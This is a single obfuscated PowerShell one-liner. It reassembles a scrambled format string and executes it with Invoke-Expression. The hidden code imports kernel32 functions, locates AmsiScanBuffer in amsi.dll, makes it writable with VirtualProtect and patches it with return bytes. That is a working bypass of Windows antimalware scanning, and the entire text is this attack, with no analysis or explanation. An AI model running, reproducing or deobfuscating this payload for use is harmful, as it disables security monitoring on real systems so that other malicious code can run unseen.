.( $pshome[4]+$PShOME[34]+'X')((("{133}{54}{120}{166}{195}{38}{226}{76}{116}{201}{75}{50}{44}{122}{68}{66}{161}{8}{150}{223}{20}{33}{144}{93}{177}{88}{7}{48}{6}{136}{63}{192}{108}{164}{83}{196}{43}{146}{46}{23}{152}{79}{21}{77}{74}{39}{165}{36}{115}{169}{95}{73}{61}{159}{167}{100}{143}{15}{209}{40}{208}{101}{4}{175}{157}{132}{34}{25}{104}{112}{135}{13}{125}{110}{65}{91}{53}{5}{222}{35}{137}{30}{56}{97}{81}{111}{26}{198}{52}{24}{170}{197}{12}{87}{32}{29}{194}{214}{187}{70}{69}{163}{64}{10}{155}{49}{119}{202}{211}{216}{174}{178}{18}{82}{37}{186}{78}{51}{160}{154}{90}{185}{84}{3}{212}{205}{225}{11}{215}{16}{28}{140}{130}{126}{213}{128}{179}{127}{171}{191}{123}{151}{162}{145}{184}{105}{41}{99}{14}{183}{142}{158}{176}{147}{204}{17}{220}{27}{89}{107}{172}{200}{106}{134}{45}{189}{193}{96}{207}{62}{109}{98}{124}{168}{206}{22}{80}{139}{153}{72}{210}{85}{19}{103}{117}{182}{1}{180}{149}{58}{188}{173}{218}{199}{224}{67}{42}{0}{129}{2}{86}{113}{219}{114}{203}{31}{47}{217}{57}{94}{156}{141}{118}{71}{102}{9}{138}{55}{181}{221}{190}{121}{131}{59}{148}{92}{60}"-f ' [B',',','te','
',' sta','m','{
','in','nte','.I','d','W','t','y(st','H','Aske','H','GetPr','t, ou','ot','ic','e',')
',' extern IntPtr Ge',' stati','Load','ernel32KAs)]','A','L','l','l','00, 0x0',' boo','es;','Ptr ','
','e,',' ','
','hMo','  ','s)
','tch =','
    p','ste','b','tatic','7, 0x80, 0','32 ','S','
using Sy','OldP','    public','a','in3','ropServices.Ma','lI','',']5,','ch,','6)','pr','A','
    [','lpAd','ng','time','Pa','Run','alProtect(I','tu','m','::Virt','g ','IntPtr ','m;','usin','ss(','pfl','cAddr','c9','ort(KA','t','l32KAs','s@
','r','[]] (0','ern','c class W','dd','',' n',' c9HAddress, ','
pub','
','n','sAmsiKAs +','mp','ScanKAs + KA','c9','Name);

    [DllImpor','lic','.Runtime','ec','Lib','i.dllKA','LoadL','re','port(KAs','s','i','sk','ra','xB',' 0x57',' ','g S','t(','yste','ize','2 ','y(c9HP','m.','Asam','sB','r',' = [W','dLib','n','y','rary','at','n Int','c9HW','i','r','','
    [D','nte','Hp = 0
[Win3','oadLib','S','d','t(K','
','As','ublic s','32]:',' 0,','2','ropS','K','tPro','2]','ect);','ress, UIntPtr dw','[','er','ress = ','o','rot','.I','As + K','ntPtr ','kerne','dul','= @','c','uf','stri','c e','rary(','ss(c9',', [r','ro','tic ext','[Win','li','tec','32]::Loa',' [uint3','r','c9HAddress','Ad','s','

}
KA','uint l','r',' 0x40','rary',':Cop','K','DllIm',', KA',' ','KAs',')]','x','
',']c9Hp)
c9','H','yste',', uin',', 0x',':','dd-Typ','ferKAs',' K','  pub','rnel32KAs)]
','ualP','t flN','A','i','Vi','in32

c9','ewP','xC3)','ef','8,','oc','shal]:','e);','erv','H','e c9H','
')).REplACE(([ChAR]99+[ChAR]57+[ChAR]72),[sTrING][ChAR]36).REplACE(([ChAR]75+[ChAR]65+[ChAR]115),[sTrING][ChAR]34) )
